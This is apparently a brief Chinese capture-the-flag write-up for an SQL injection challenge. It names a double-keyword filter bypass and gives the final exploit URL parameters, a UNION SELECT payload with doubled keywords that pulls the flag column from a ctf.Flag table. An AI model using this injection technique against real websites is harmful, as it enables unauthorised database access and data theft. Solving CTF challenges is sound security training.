sql 注入题目
简单实用双写绕过。
最后exp为
?username=admin&password=pwd %27 ununionion seselectlect 1,2,group_concat(flag)frfromom(ctf.Flag)%23